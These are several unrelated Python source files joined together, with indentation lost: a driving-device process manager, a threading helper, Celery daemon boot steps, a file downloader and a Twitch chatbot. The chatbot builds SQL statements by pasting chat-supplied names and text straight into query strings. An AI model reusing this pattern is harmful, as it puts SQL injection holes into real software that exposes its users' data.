cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
if ANDROID:
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
if params.get("LaneChangeEnabled") is None:
params.put("LaneChangeEnabled", "1")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
threading_utilities.py
|
import threading
from data_science.simulation.time import TimeSimulator
class StoppableThread(threading.Thread):
"""
Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition.
"""
def __init__(self, target=None):
if target is None:
super(StoppableThread, self).__init__()
else:
super(StoppableThread, self).__init__(target=target)
self._stop_event = threading.Event()
def stop(self):
"""
Stop the thread.
:param self: self
"""
self._stop_event.set()
def stopped(self):
"""
The stop event was triggered.
:param self: self
"""
return self._stop_event.is_set()
class ThreadableClass():
"""A class to provide threading functionality. Just overwriting run()."""
def __init__(self, update_time=0.5):
self.update_time = update_time
self.time_sim = TimeSimulator()
def do_something(self):
pass
def run(self):
while True:
if self.time_sim.tick(self.update_time):
self.do_something()
if self.thread.stopped():
break
def start(self):
"""
Start the thread.
:param self: self
"""
self.thread = StoppableThread(target=self.run)
self.thread.start()
def stop(self):
"""
Stop the thread.
:param self: self
"""
self.thread.stop()
self.thread.join()
|
bootsteps.py
|
from __future__ import absolute_import
import os
import json
from subprocess import PIPE, STDOUT
from threading import Thread
from logging import getLogger
from time import sleep
try:
# noinspection PyCompatibility
from Queue import Queue
except ImportError:
# noinspection PyUnresolvedReferences,PyCompatibility
from queue import Queue
from psutil import Popen, NoSuchProcess
from celery.bootsteps import StartStopStep
from frozendict import frozendict
from que import E_SHUTDOWN, Q_MGMT, Q_FAST
logger = getLogger(__name__)
class ESDCDaemon(StartStopStep):
"""
A common boot step for all erigonesd services.
"""
label = 'ESDCDaemon'
requires = ('celery.worker.components:Pool',)
def start(self, parent):
logger.info('Starting %s on %s', self.label, parent.hostname)
def stop(self, parent):
logger.info('Stopping %s on %s', self.label, parent.hostname)
logger.warn('%s is shutting down', parent.hostname)
E_SHUTDOWN.set()
class _PeriodicTaskDaemon(StartStopStep):
"""
An abstract boot step for building a daemon, which runs tasks in periodic interval.
"""
_stopping = False
_interval = 60
_priority = 10
def __init__(self, parent, **kwargs):
super(_PeriodicTaskDaemon, self).__init__(parent, **kwargs)
self._timer = parent.timer
self._tref = None
self._redis = parent.app.backend.client
self._periodic_tasks = []
def _periodic(self):
for task in self._periodic_tasks:
task()
def start(self, parent):
logger.info('Starting %s on %s', self.label, parent.hostname)
self._tref = self._timer.call_repeatedly(self._interval, self._periodic, priority=self._priority)
def stop(self, parent):
logger.info('Stopping %s on %s', self.label, parent.hostname)
self._stopping = True
if self._tref:
self._tref.cancel()
self._tref = None
class FastDaemon(_PeriodicTaskDaemon):
"""
Danube Cloud internal fast daemon - runs two threads for monitoring VM status changes.
"""
label = 'FastDaemon'
node_uuid = None
vm_status_queue = None
vm_status_watcher = None
vm_status_dispatcher_thread = None
vm_status_monitor_thread = None
SYSEVENT = ('sysevent', '-j', '-c', 'com.sun:zones:status', 'status')
VM_STATUS = frozendict({
'running': 'running',
'uninitialized': 'stopped'
})
def __init__(self, parent, **kwargs):
hostname = parent.hostname
self._conf = parent.app.conf
self.enabled = self._conf.ERIGONES_FAST_DAEMON_ENABLED and hostname.startswith(Q_FAST + '@')
super(FastDaemon, self).__init__(parent, **kwargs)
if self.enabled:
self._periodic_tasks.append(self._vm_status_thread_check)
def _vm_status_dispatcher(self):
"""THREAD: Reads VM status changes from queue and creates a vm_status_event_cb task for every status change"""
from que.utils import task_id_from_string, send_task_forever # Circular imports
vm_status_task = self._conf.ERIGONES_VM_STATUS_TASK
task_user = self._conf.ERIGONES_TASK_USER
queue = self.vm_status_queue
logger.info('Emitting VM status changes on node %s via %s', self.node_uuid, vm_status_task)
while True:
event = queue.get()
task_id = task_id_from_string(task_user)
logger.info('Creating task %s for event: "%s"', task_id, event)
# Create VM status task
send_task_forever(self.label, vm_status_task, args=(event, task_id), queue=Q_MGMT, expires=None,
task_id=task_id)
def _vm_status_monitor(self, sysevent_stdout):
"""THREAD: Reads line by line from sysevent process and puts relevant VM status changes into queue"""
vm_status = self.VM_STATUS
node_uuid = self.node_uuid
queue = self.vm_status_queue
logger.info('Monitoring VM status changes on node %s', node_uuid)
for line in iter(sysevent_stdout.readline, ''):
line = line.strip()
try:
event = json.loads(line)['data']
except Exception as e:
logger.critical('Could not parse (%s), sysevent line: "%s"', e, line)
continue
try:
state = vm_status[event.get('newstate')]
except KeyError:
logger.debug('Ignoring event "%s"', event)
continue
event['node_uuid'] = node_uuid
event['state'] = state
logger.info('Got new event: "%s"', event)
queue.put(event)
def _vm_status_thread_check(self):
"""Check if both vm_status threads are alive. Run periodically."""
if not self._stopping:
if self.vm_status_monitor_thread and not self.vm_status_monitor_thread.is_alive():
err = 'VM status monitoring thread is not running - terminating %s!' % self.label
logger.critical(err)
raise SystemExit(err)
if self.vm_status_dispatcher_thread and not self.vm_status_dispatcher_thread.is_alive():
err = 'VM status dispatcher thread is not running - terminating %s!' % self.label
logger.critical(err)
raise SystemExit(err)
def _set_node_uuid(self):
"""Fetch compute node's UUID"""
from que.utils import fetch_node_uuid # Circular imports
from que.exceptions import NodeError
try:
self.node_uuid = fetch_node_uuid()
except NodeError as exc:
err = str(exc)
logger.critical(err)
raise SystemExit(err)
def start(self, parent):
self._set_node_uuid()
super(FastDaemon, self).start(parent)
self.vm_status_queue = Queue()
self.vm_status_watcher = Popen(self.SYSEVENT, bufsize=0, close_fds=True, stdout=PIPE, stderr=STDOUT,
preexec_fn=os.setsid)
self.vm_status_monitor_thread = Thread(target=self._vm_status_monitor, name='VMStatusMonitor',
args=(self.vm_status_watcher.stdout,))
self.vm_status_monitor_thread.daemon = True
self.vm_status_monitor_thread.start()
self.vm_status_dispatcher_thread = Thread(target=self._vm_status_dispatcher, name='VMStatusDispatcher')
self.vm_status_dispatcher_thread.daemon = True
self.vm_status_dispatcher_thread.start()
def stop(self, parent):
super(FastDaemon, self).stop(parent)
if self.vm_status_watcher:
try:
self.vm_status_watcher.terminate()
except NoSuchProcess:
pass
else:
self.vm_status_watcher.wait()
class MgmtDaemon(_PeriodicTaskDaemon):
"""
Danube Cloud internal mgmt daemon - periodically monitors compute nodes.
"""
label = 'MgmtDaemon'
requires = ('celery.worker.consumer:Events', 'celery.worker.consumer:Gossip')
def __init__(self, parent, **kwargs):
conf = parent.app.conf
self.enabled = conf.ERIGONES_MGMT_DAEMON_ENABLED and parent.hostname.startswith(Q_MGMT + '@')
super(MgmtDaemon, self).__init__(parent, **kwargs)
if self.enabled:
self.app = parent.app
# noinspection PyProtectedMember
from api.node.status.tasks import node_status_all
self._periodic_tasks.append(node_status_all)
def _node_lost(self, worker):
logger.warn('missed heartbeat from %s', worker.hostname)
self.dispatcher.send('worker-lost', worker_hostname=worker.hostname)
def _enable_worker_lost_event(self, gossip):
# noinspection PyAttributeOutsideInit
self.dispatcher = gossip.dispatcher
logger.info('Monkey patching gossip.on_node_lost')
gossip.on_node_lost = self._node_lost
def __worker_status_monitor(self):
# noinspection PyProtectedMember
from api.node.status.tasks import node_worker_status_change
def _worker_state(hostname, status, event):
logger.info('Received %s node worker status: %s', hostname, status)
queue, node_hostname = hostname.split('@')
if queue != Q_MGMT:
node_worker_status_change(node_hostname, queue, status, event)
def worker_online(event):
_worker_state(event['hostname'], 'online', event)
def worker_offline(event):
_worker_state(event['hostname'], 'offline', event)
def worker_lost(event):
_worker_state(event['worker_hostname'], 'offline', event)
# Here we go
with self.app.connection() as conn:
recv = self.app.events.Receiver(conn, handlers={
'worker-online': worker_online,
'worker-offline': worker_offline,
'worker-lost': worker_lost,
})
recv.capture(limit=None, timeout=None, wakeup=False)
def _worker_status_monitor(self):
"""THREAD: Runs celery's task queue receiver and monitors worker related events"""
while True:
logger.info('Starting worker status monitor')
try:
self.__worker_status_monitor()
except Exception as exc:
logger.exception(exc)
logger.critical('Worker status monitor terminated. Restarting in 5 seconds...')
sleep(5)
def start(self, parent):
self._enable_worker_lost_event(parent.gossip)
super(MgmtDaemon, self).start(parent)
worker_status_monitor_thread = Thread(target=self._worker_status_monitor, name='WorkerStatusMonitor')
worker_status_monitor_thread.daemon = True
worker_status_monitor_thread.start()
|
downloader.py
|
import os
import sys
import multiprocessing as mp
import time
from datetime import timedelta
from types import FunctionType
import requests
import colors
from .page import Page
from . import utils, const
class Downloader:
cli_initialized: bool
terminating: bool
processes: slice
captcha_process: mp.Process
captcha_solve_func: FunctionType
download_url_queue: mp.Queue
parts: int
def __init__(self, captcha_solve_func):
self.captcha_solve_func = captcha_solve_func
self.cli_initialized = False
def terminate(self):
self.terminating = True
if self.cli_initialized:
sys.stdout.write("\033[{};{}H".format(self.parts + const.CLI_STATUS_STARTLINE + 2, 0))
sys.stdout.write("\033[?25h") # show cursor
self.cli_initialized = False
print('Terminating download. Please wait for stopping all processes.')
if self.captcha_process is not None:
self.captcha_process.terminate()
for p in self.processes:
p.terminate()
print('Download terminated.')
return
def _captcha_breaker(self, page, parts):
while True:
utils.print_captcha_status("Solving CAPTCHA...", parts)
self.download_url_queue.put(
page.get_captcha_download_link(
captcha_solve_func=self.captcha_solve_func,
print_func=lambda text: utils.print_captcha_status(text, parts)
)
)
@staticmethod
def _download_part(part, download_url_queue):
"""Download given part of the download.
Arguments:
part (dict): Specification of the part to download
"""
id = part['id']
utils.print_part_status(id, "Starting download")
part['started'] = time.time()
part['now_downloaded'] = 0
# Note the stream=True parameter
r = requests.get(part['download_url'], stream=True, allow_redirects=True, headers={
"Range": "bytes={}-{}".format(part['from'] + part['downloaded'], part['to'])
})
if r.status_code != 206 and r.status_code != 200:
utils.print_part_status(id, colors.red(f"Status code {r.status_code} returned"))
raise RuntimeError(f"Download of part {id} returned status code {r.status_code}")
with open(part['filename'], 'ab') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
part['downloaded'] += len(chunk)
part['now_downloaded'] += len(chunk)
elapsed = time.time() - part['started']
# Print status line
speed = part['now_downloaded'] / elapsed if elapsed > 0 else 0 # in bytes per second
remaining = (part['size'] - part['downloaded']) / speed if speed > 0 else 0 # in seconds
utils.print_part_status(id, "{}%\t{:.2f}/{:.2f} MB\tspeed: {:.2f} KB/s\telapsed: {}\tremaining: {}".format(
round(part['downloaded'] / part['size'] * 100, 1),
round(part['downloaded'] / 1024**2, 2), round(part['size'] / 1024**2, 2),
round(speed / 1024, 2),
str(timedelta(seconds=round(elapsed))),
str(timedelta(seconds=round(remaining))),
))
part['elapsed'] = time.time() - part['started']
utils.print_part_status(id, colors.green("Successfully downloaded {}{} MB in {} (speed {} KB/s)".format(
round(part['now_downloaded'] / 1024**2, 2),
"" if part['now_downloaded'] == part['downloaded'] else ("/"+str(round(part['downloaded'] / 1024**2, 2))),
str(timedelta(seconds=round(part['elapsed']))),
round(part['now_downloaded'] / part['elapsed'] / 1024, 2) if part['elapsed'] > 0 else 0
)))
# Free this (still valid) download URL for next use
download_url_queue.put(part['download_url'])
def download(self, url, parts=10, target_dir=""):
"""Download file from Uloz.to using multiple parallel downloads.
Arguments:
url (str): URL of the Uloz.to file to download
parts (int): Number of parts that will be downloaded in parallel (default: 10)
target_dir (str): Directory where the download should be saved (default: current directory)
"""
self.url = url
self.parts = parts
self.processes = []
self.captcha_process = None
self.target_dir = target_dir
self.terminating = False
started = time.time()
previously_downloaded = 0
# 1. Prepare downloads
print("Starting downloading for url '{}'".format(url))
# 1.1 Get all needed information
print("Getting info (filename, filesize, ...)")
try:
page = Page(url)
page.parse()
except RuntimeError as e:
print(colors.red('Cannot download file: ' + str(e)))
sys.exit(1)
# Do check
output_filename = os.path.join(target_dir, page.filename)
if os.path.isfile(output_filename):
print(colors.yellow("WARNING: File '{}' already exists, overwrite it? [y/n] ".format(output_filename)), end="")
if input().strip() != 'y':
sys.exit(1)
isCAPTCHA = False
if page.quickDownloadURL is not None:
print("You are VERY lucky, this is QUICK direct download without CAPTCHA, downloading as 1 quick part :)")
download_type = "fullspeed direct download (without CAPTCHA)"
download_url = page.quickDownloadURL
parts = 1
self.parts = 1
elif page.slowDownloadURL is not None:
print("You are lucky, this is slow direct download without CAPTCHA :)")
download_type = "slow direct download (without CAPTCHA)"
download_url = page.slowDownloadURL
else:
print("CAPTCHA protected download - CAPTCHA challenges will be displayed\n")
download_type = "CAPTCHA protected download"
isCAPTCHA = True
download_url = page.get_captcha_download_link(
captcha_solve_func=self.captcha_solve_func,
print_func=lambda text: sys.stdout.write(colors.blue("[CAPTCHA solve]\t") + text + "\033[K\r")
)
head = requests.head(download_url, allow_redirects=True)
total_size = int(head.headers['Content-Length'])
part_size = (total_size + (parts - 1)) // parts
# 1.3 Prepare download info for parts
downloads = [
{
'id': i + 1,
'filename': "{0}.part{1:0{width}}of{2}".format(output_filename, i + 1, parts, width=len(str(parts))),
'from': part_size * i,
'to': min(part_size * (i + 1), total_size) - 1,
'downloaded': 0,
} for i in range(parts)
]
# 2. Initialize cli status table interface
os.system('cls' if os.name == 'nt' else 'clear') # if windows, use 'cls', otherwise use 'clear'
sys.stdout.write("\033[?25l") # hide cursor
self.cli_initialized = True
print(colors.blue("File:\t\t") + colors.bold(page.filename))
print(colors.blue("URL:\t\t") + url)
print(colors.blue("Download type:\t") + download_type)
print(colors.blue("Total size:\t") + colors.bold("{}MB".format(round(total_size / 1024**2, 2))))
print(colors.blue("Parts:\t\t") + "{} x {}MB".format(parts, round(part_size / 1024**2, 2)))
for part in downloads:
if isCAPTCHA:
utils.print_part_status(part['id'], "Waiting for CAPTCHA...")
else:
utils.print_part_status(part['id'], "Waiting for download to start...")
# Prepare queue for recycling download URLs
self.download_url_queue = mp.Queue(maxsize=0)
if isCAPTCHA:
# Reuse already solved CAPTCHA
self.download_url_queue.put(download_url)
# Start CAPTCHA breaker in separate process
self.captcha_process = mp.Process(target=self._captcha_breaker, args=(page, self.parts))
self.captcha_process.start()
# 3. Start all downloads
for part in downloads:
if self.terminating:
return
id = part['id']
part['size'] = part['to'] - part['from'] + 1
# Test if the file isn't downloaded from previous download. If so, try to continue
if os.path.isfile(part['filename']):
part['downloaded'] = os.path.getsize(part['filename'])
previously_downloaded += part['downloaded']
if part['downloaded'] == part['size']:
utils.print_part_status(id, colors.green("Already downloaded from previous run, skipping"))
continue
if isCAPTCHA:
part['download_url'] = self.download_url_queue.get()
else:
part['download_url'] = download_url
# Start download process in another process (parallel):
p = mp.Process(target=Downloader._download_part, args=(part, self.download_url_queue))
p.start()
self.processes.append(p)
if isCAPTCHA:
# no need for another CAPTCHAs
self.captcha_process.terminate()
utils.print_captcha_status("All downloads started, no need to solve another CAPTCHAs", self.parts)
# 4. Wait for all downloads to finish
success = True
for p in self.processes:
p.join()
if p.exitcode != 0:
success = False
# Check all downloads
checkError = False
for part in downloads:
if not os.path.isfile(part['filename']):
utils.print_part_status(part['id'], colors.red(
f"ERROR: Part '{part['filename']}' missing on disk"
))
checkError = True
continue
size = os.path.getsize(part['filename'])
if size != part['size']:
utils.print_part_status(part['id'], colors.red(
f"ERROR: Part '{part['filename']}' has wrong size {size} bytes (instead of {part['size']} bytes)"
))
os.remove(part['filename'])
checkError = True
sys.stdout.write("\033[{};{}H".format(parts + const.CLI_STATUS_STARTLINE + 2, 0))
sys.stdout.write("\033[K")
sys.stdout.write("\033[?25h") # show cursor
self.cli_initialized = False
if not success:
print(colors.red("Failure of one or more downloads, exiting"))
sys.exit(1)
if checkError:
print(colors.red("Wrong sized parts deleted, please restart the download"))
sys.exit(1)
# 5. Concatenate all parts into final file and remove partial files
elapsed = time.time() - started
speed = (total_size - previously_downloaded) / elapsed if elapsed > 0 else 0 # in bytes per second
print(colors.green("All downloads finished"))
print("Stats: Downloaded {}{} MB in {} (average speed {} MB/s), merging files...".format(
round((total_size - previously_downloaded) / 1024**2, 2),
"" if previously_downloaded == 0 else ("/"+str(round(total_size / 1024**2, 2))),
str(timedelta(seconds=round(elapsed))),
round(speed / 1024**2, 2)
))
with open(output_filename, "wb") as outfile:
for part in downloads:
with open(part['filename'], "rb") as infile:
outfile.write(infile.read())
for part in downloads:
os.remove(part['filename'])
print(colors.green("Parts merged into output file '{}'".format(output_filename)))
|
brdybot.py
|
#this is for opening the configuration file
import sys
import configparser
#this is for connecting to IRC
import socket
#this is for connecting to the postgres database
import psycopg2
#this is for doing cute equations
import math
#for multithreading for additional channels
import threading
#traceback is for error handling/printing so i can figure out what went wrong
import traceback
#sleep is so the bot won't overload during listening
from time import sleep
def main():
conn, token, user, readbuffer, server = connectionVariables()
#channels = performSQL("SELECT channelname FROM bot.channel ch WHERE ch.channelname = 'brdy'")
channels = performSQL("SELECT channelname FROM bot.channel ch WHERE ch.channelid NOT in(SELECT cd.channelid FROM bot.channeldeletion cd)")
commandDict = getCommands()
for channel in channels:
channel = channel[0]
operators = getOperants(channel)
threading.Thread(target=ircListen, args=(conn, token, user, channel, server, operators, commandDict)).start()
sleep(2)
def getOperants(channel):
operators = []
operants = performSQL("""SELECT operantname FROM bot.channeloperant co
LEFT JOIN bot.channel ch ON co.channelid = ch.channelid
LEFT JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+channel+"'")
for operant in operants:
operators.append(operant[0])
return operators
def connectionVariables():
connection_data = ('irc.chat.twitch.tv', 6667)
token = getToken()
botName = "brdybot"
readbuffer = ''
server = socket.socket()
return connection_data, token, botName, readbuffer, server
def getToken():
config = configparser.ConfigParser()
file = "chatbot.ini"
config.read(file)
token = config['chatbot']['token']
return token
def ircListen(conn, token, botName, channel, server, operators, commandDict):
try:
listenFlag = True
#joining the channel
server = socket.socket()
server.connect(conn)
server.send(bytes('PASS ' + token + '\r\n', 'utf-8'))
server.send(bytes('NICK ' + botName + '\r\n', 'utf-8'))
server.send(bytes('JOIN #' + channel + '\r\n', 'utf-8'))
#listening loop
print("Starting bot in channel " +channel + " with operants: "+str(operators))
while listenFlag:
response = server.recv(2048).decode('utf-8')
if len(response) == 0:
break
if "PING" in str(response):
pong = str(response).replace("PING","PONG")
server.send(bytes(pong, 'utf-8'))
server.send(bytes('PONG\r\n', 'utf-8'))
elif "!" in str(response):
#fetch the username,message,etc. from the response without grabbing pings, errors, or erroneous messages
if len(str(response)) > 2:
username = str(response).split('!',1)[0][1:]
if ":" in str(response):
splitResp = str(response).split(':')
if len(splitResp) > 3:
splitResp = str(response).split(':')[2]+str(response).split(':')[3]
else:
splitResp = str(response).split(':')[2]
userMessage = splitResp[0:len(splitResp)-2]
else:
userMessage = " "
command = userMessage.split(" ")[0].lower().replace("'","''")
parameters = userMessage.split(" ")[1:]
permissions = (username in operators) or (channel == 'brdybot') or (command == "!botinfo")
if ("!" in command[0:1]) and (command[1:] in commandDict) and permissions:
commandid = commandDict[command[1:]]
commandrequestid = logCommand(commandid,channel,username,parameters)
message = None
message = doCommand(commandrequestid)
if message:
chatMessage(message,channel,server)
operators = getOperants(channel)
success = storeMessage(message, commandrequestid)
sleep(1)
except ConnectionResetError:
logException(None, "ConnectionResetError", channel)
except IndexError:
logException(commandrequestid,"IndexError", channel)
except KeyError:
logException(commandrequestid,"KeyError", channel)
except RuntimeError:
logException(commandrequestid,"RuntimeError", channel)
except SystemExit:
logException(commandrequestid,"SystemExit", channel)
except ValueError:
logException(commandrequestid,"ValueError", channel)
except BrokenPipeError:
logException(commandrequestid,"BrokenPipeError", channel)
except ConnectionAbortedError:
logException(commandrequestid,"ConnectionAbortedError", channel)
except ConnectionRefusedError:
logException(commandrequestid,"ConnectionRefusedError", channel)
except FileNotFoundError:
logException(commandrequestid,"FileNotFoundError", channel)
except TimeoutError:
logException(commandrequestid,"TimeoutError", channel)
except Exception:
logException(commandrequestid,"OtherError", channel)
def getCommands():
commands = performSQL("SELECT commandid,commandname FROM bot.command")
commandDict = {}
for command in commands:
commandDict[command[1]] = command[0]
return commandDict
def doCommand(commandrequestid):
conn, token, botName, readbuffer, server = connectionVariables()
parameters = []
ccr = performSQL("SELECT com.commandname,ch.channelname,op.operantname,ccrp.channelcommandrequestparameter FROM bot.channelcommandrequest ccr LEFT JOIN bot.command com ON ccr.commandid = com.commandid LEFT JOIN bot.channel ch ON ccr.channelid = ch.channelid LEFT JOIN bot.operant op ON ccr.operantid = op.operantid LEFT JOIN bot.channelcommandrequestparameter ccrp ON ccr.channelcommandrequestid = ccrp.channelcommandrequestid WHERE ccr.channelcommandrequestid ="+str(commandrequestid))
for command,channel,username,parameter in ccr:
parameters.append(parameter)
if command == "mon":
message = getMonInfo(parameters,channel)
elif command == "move":
message = getMoveInfo(parameters,channel)
elif command == "ability":
message = getAbilityInfo(parameters,channel)
# elif command == "xp":
# message = getXPYield()
# elif command == "bst":
# message = getBST()
# elif command == "learnset":
# message = getMonMoves()
# elif command == "evolution":
# message = getMonEvo()
elif command == "nature":
message = getNatureInfo(parameters,channel)
elif command == "weak":
message = getWeaknessInfo(parameters,channel)
elif command == "coverage":
message = getCoverage(parameters,channel)
elif command == "abbrevs":
message = getAbbrevs()
elif command == "gamelist":
message = getGames()
elif command == "pokegame":
message = setGame(parameters, channel, server)
elif command == "pokeops":
message = addOperants(parameters,channel)
elif command == "removeops" and channel == username:
message = removeOperants(parameters,channel)
elif command == "listops":
message = listOperants(channel)
elif command == "join" and channel == "brdybot":
message = addClient(conn,token,botName,username,server)
elif command == "brdybotleave" and channel == username:
message = removeClient(username)
elif command == "pokecom":
commands = "!mon, !move, !ability, !coverage, !nature, !weak, !pokegame, !abbrevs, !gamelist, !botinfo, !listops, !pokeops, !pokecom, !brdybotleave"
message = "Available commands are " + commands + "."
elif command == "botinfo":
message = "Visit https://www.twitch.tv/brdybot/about"
return message
def storeMessage(message,ccrid):
success = performSQL("UPDATE bot.channelcommandrequest SET channelcommandrequestreturn ='"+message.replace("'","''")+"' WHERE channelcommandrequestid = "+str(ccrid)+" RETURNING channelcommandrequestid;")
return success
def logException(commandrequestid, exception, channel):
channelid = getChannelID(channel)
if not commandrequestid:
commandrequestid = "null"
errortypeid = performSQL("SELECT errortypeid FROM bot.errortype WHERE errortypename = '"+exception+"'")
if errortypeid != []:
errortypeid = errortypeid[0][0]
else:
errortypeid = performSQL("SELECT errortypeid FROM bot.errortype WHERE errortypename = 'OtherError'")
channelerrorid = performSQL("INSERT INTO bot.channelerror (channelcommandrequestid,errortypeid) VALUES ("+str(commandrequestid)+","+str(errortypeid)+") RETURNING channelerrorid;")
traceback.print_exc()
print(" with channelerrorid = "+str(channelerrorid))
commandDict = getCommands()
conn, token, user, readbuffer, server = connectionVariables()
operators = getOperants(channel)
threading.Thread(target=ircListen, args=(conn, token, "brdybot", channel, server, operators, commandDict)).start()
sys.exit()
def getChannelID(channel):
channelid = performSQL("SELECT ch.channelid FROM bot.channel ch WHERE ch.channelname ='"+channel+"'")[0][0]
return channelid
def logCommand(commandid,channelname,operantname,parameters):
commandname = performSQL("SELECT com.commandname FROM bot.command com WHERE com.commandid = "+str(commandid))[0][0]
if commandid == 9:
success = addOperants([operantname],channelname)
channelid = getChannelID(channelname)
operantid = performSQL("SELECT op.operantid FROM bot.operant op WHERE op.operantname = '"+operantname+"'")[0][0]
print("\r\n________________________________________________________________________________________________________")
print("Received the "+commandname+" command in channel "+channelname+" from user "+operantname+". Parameters: "+str(parameters)+"\r\n")
channelcommandrequestid = performSQL("INSERT INTO bot.channelcommandrequest (commandid,channelid,operantid) VALUES ("+str(commandid)+","+str(channelid)+","+str(operantid)+") RETURNING channelcommandrequestid;")[0][0]
